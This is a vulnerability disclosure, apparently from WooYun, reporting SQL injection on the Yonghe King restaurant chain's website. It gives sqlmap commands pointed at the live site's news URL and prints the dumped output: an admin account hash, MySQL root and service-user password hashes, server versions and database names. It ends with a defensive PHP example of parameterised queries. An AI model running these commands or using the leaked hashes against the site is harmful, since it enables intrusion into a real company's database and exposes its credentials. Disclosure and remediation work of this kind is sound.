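2015-05-07: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public
2015-06-21: The vendor has actively ignored the vulnerability; details are disclosed to the public
Yonghe King (永和大王) official website SQL injection, all database information leaked
The news page has a SQL injection vulnerability. The sqlmap commands below retrieve information about the database.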
python sqlmap.py -u "http://www.yonghe.com.cn/index.php/Index/newsdetail/id/33*" -D yonghe --tables --dump
python sqlmap.py -u "http://www.yonghe.com.cn/index.php/Index/newsdetail/id/33*" -f --banner --dbs --users --passwords
Administrator information can be obtained from the yonghe table
"[email protected]","b9fdf1d3d7057e7239845f0ad5985dc3","admin"
Database information
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: active fingerprint: MySQL >= 5.5.0
               banner parsing fingerprint: MySQL 5.5.34
banner: '5.5.34-0ubuntu0.12.04.1'
database management system users [8]:
[*] ''@'AY140115163925310e5cZ'
[*] ''@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'AY140115163925310e5cZ'
[*] 'root'@'localhost'
[*] 'yonghe'@'localhost'
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *FE7932639B39CFBDF97D3296B3157D549AA0C24A
[*] root [1]:
    password hash: *75DB42791C88045A1CAE037435527B1B5FED91D6
[*] yonghe [1]:
    password hash: *9F4C215BAFC94F7E1EC9D3B4BFB054D5A55C0BE1
available databases [9]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] pinpaidashi
[*] test
[*] yhwechat_201404
[*] yhwechat_201408
[*] yhwechat_201501
[*] yonghe
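A sample of the database records that were downloaded
Review the application code and escape the PHP $_GET variables before they are used in SQL queries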
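One way to apply this fix to a numeric id parameter, as an added example that is not code from the report or from the site. It binds the id as an integer parameter instead of relying on escaping alone, because escaping does not protect a value that is placed unquoted in the query. The `news` table, its columns and the function names are hypothetical, and in-memory SQLite stands in for the MySQL back end so the block runs offline.

```php
<?php
// Added example, not the site's code. Table, columns and function names are
// hypothetical; in-memory SQLite stands in for the MySQL back end.

function demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, published INTEGER)');
    // Constructed sample rows; id 34 is an unpublished draft.
    $db->exec("INSERT INTO news VALUES (33, 'Store opening', 1), (34, 'Draft', 0)");
    return $db;
}

// Vulnerable pattern: the request value becomes part of the SQL text.
// Escaping quotes would not help, since the value sits in a numeric context.
function news_detail_unsafe(PDO $db, string $id): array
{
    $sql = "SELECT id, title FROM news WHERE published = 1 AND id = $id";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened pattern: validate the type, then bind the value as a parameter.
function news_detail_safe(PDO $db, string $id): array
{
    if (!ctype_digit($id) || strlen($id) > 9) {
        return [];   // reject anything that is not a plain non-negative integer
    }
    $stmt = $db->prepare('SELECT id, title FROM news WHERE published = 1 AND id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal id, a value that alters the WHERE clause,
// and a value that breaks the SQL syntax.
$db = demo_db();
foreach (['33', '33 OR 1=1', "33'"] as $id) {
    try {
        $unsafe = count(news_detail_unsafe($db, $id));
    } catch (PDOException $e) {
        $unsafe = 'SQL error';
    }
    printf("%-12s unsafe=%-10s safe=%d\n", $id, $unsafe, count(news_detail_safe($db, $id)));
}
```

In a real handler the `$id` argument would come from `$_GET` or the route segment, and the same prepared statement works unchanged with the PDO MySQL driver.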
Unable to contact the vendor, or the vendor actively refused
Vulnerability Rank: 8 (WooYun rating)